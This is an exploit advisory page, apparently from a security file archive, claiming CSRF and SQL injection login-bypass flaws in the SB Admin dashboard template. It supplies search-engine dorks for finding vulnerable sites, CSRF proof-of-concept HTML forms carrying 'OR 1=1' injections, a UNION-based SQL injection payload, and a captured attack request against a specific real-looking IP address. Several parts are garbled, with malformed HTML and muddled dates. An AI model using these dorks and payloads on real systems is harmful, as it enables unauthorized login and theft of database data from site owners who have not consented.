exploit the possibilities

SB Admin Cross Site Request Forgery / SQL Injection

SB Admin Cross Site Request Forgery / SQL Injection
Posted Jan 17, 2022
Authored by Taurus Omar

SB Admin suffers from cross site request forgery and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, csrf
SHA-256 | bc481b1b6ef15e1c81979f3faa7fd5e035acbdc0fedd25844262c33dc6b8c43d

SB Admin Cross Site Request Forgery / SQL Injection

Change Mirror Download
$$$$$$$\                                                 
$$ __$$\
$$ | $$ |$$\ $$\ $$\ $$$$$$$\ $$$$$$\ $$$$$$$\
$$$$$$$ |$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ _____|
$$ ____/ $$ | $$ | $$ |$$ | $$ | $$$$$$$$ |$$ /
$$ | $$ | $$ | $$ |$$ | $$ | $$ ____|$$ |
$$ | \$$$$$\$$$$ |$$ | $$ |$$\\$$$$$$$\ \$$$$$$$\
\__| \_____\____/ \__| \__|\__|\_______| \_______|
Offensive Security Community [Ecuador]


Credits & Authors:
==================
Taurus Omar - @TaurusOmar_ (whoami@taurusomar) [taurusomar.com]

Document Title:
===============
SB Admin Bootstrap CSRF / Sqli Vulnerability / Bypasss Login Access


Severity Level:
===============
High

Google & Bing Dorks
===================
intitle:SB Admin - login
intitle:SB Admin 2 - login

Affect
===================
Araound: 1 Millions of sites

Vulnerability Reported Timeline:
==================================
2021-31-07: Reported

Vulnerability Disclosure Timeline:
==================================
2022-15-01: Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================
SB Admin
SB Admin 2

Product & Service Introduction:
===============================
SB Admin, a well-known dashboard template recently migrated to Bootstrap 5.
This iconic product comes with minimal custom styling using Google's material
design patterns and pre-build pages like a dashboard, charts, data tables,
and authentication pages, styles along with a variety of plugins to create a
powerful framework for creating admin panels, web apps, or dashboard UI's for
your next project. The product uses PUG templates, SCSS and JS scripts for
compilation and production build (no Gulp or heavier Webpack).

Abstract Advisory Information:
==============================
An independent researcher discovered Multiple Vulnerabilities in the official aplication SB Admin

CSRF Technical Details & Description:
=====================================
A client-side cross site request forgery vulnerability has been discovered in the official SB Admin control web-application.
The vulnerability allows to execute unauthorized client-side application functions without secure validation or session token protection mechanism.
The security risk of the cross site request forgery vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5.
Exploitation of the vulnerability dont requires web-application user account and low user interaction. Successful exploitation of the vulnerability results in unauthorized add or add of SB Admin connect service panel staff.The web vulnerability can be exploited by any attackers.

Proof video:
============
https://imgur.com/A6KuhcW

Proof of Concept CSRF (PoC-1):
==============================
<html>
<body>
<form action="https://site.com/panel/index.html" method="POST">
<div class="form-group">
<input type="hidden" class="form-control form-control-user" aria-describedby="emailHelp" id="exampleInputEmail1" value="" OR 1 = 1 -- -"" required="">
</div>
<div class="form-group">
<input type="hidden" class="form-control form-control-user" id="exampleInputPassword" value="" OR 1 = 1 -- -"" required="">
</div>
<div class="form-group">
</div>
</div>
<button type="submit" class="btn btn-primary btn-user btn-block">
Login
</button>
</form>

Proof of Concept CSRF (PoC-2):
==============================
<html>
<body>
<form action="https://site.com/panel/index.php" method="POST">
<div class="form-group">
<input type="hidden" class="form-control form-control-user" aria-describedby="emailHelp" id="exampleInputEmail1" value="" OR 1 = 1 -- -"" required="">
</div>
<div class="form-group">
<input type="hidden" class="form-control form-control-user" id="exampleInputPassword" value="" OR 1 = 1 -- -"" required="">
</div>
<div class="form-group">
</div>
</div>
<button type="submit" class="btn btn-primary btn-user btn-block">
Login
</button>
</form>


Sqli Technical Details & Description:
=====================================
The SQL injection attack consists of insertion or “injection” of a SQL query via
the input-login data from the client to the application. The successful SQL injection
exploit can read sensitive data from the database, modify database data
(Insert/Update/Delete), execute administration operations on the database
(such as shutdown the DBMS), recover the content of a given file present on the DBMS file system.

Proof video:
============
https://imgur.com/0Z7vtj4

Payload:
========
usuario=§" OR 1 = 1 UNION ALL SELECT CONCAT(0x716b767671,0x677571554f657363504e4974794a7a4a6e43786b727a45514d5146766f6241706a73716e4c527651,0x7178627071),NULL-- - -- -"§&password=§" OR 1 = 1 -- -"§

BurpSuite
==========
POST /requisicao/login.php HTTP/1.1
Host: 186.251.225.174
Content-Length: 47
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://186.251.225.174
Referer: http://186.251.225.174/login.html
Accept-Encoding: gzip, deflate
Accept-Language: es-CO,es;q=0.9
Connection: close

usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"

Inputs Vulnerabilities
======================
usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"
email=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"
username=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"
user=" OR 1 = 1 -- -"&pass=" OR 1 = 1 -- -"


#######
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's
# responsibility.
#
#######
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    19 Files
  • 25
    May 25th
    5 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close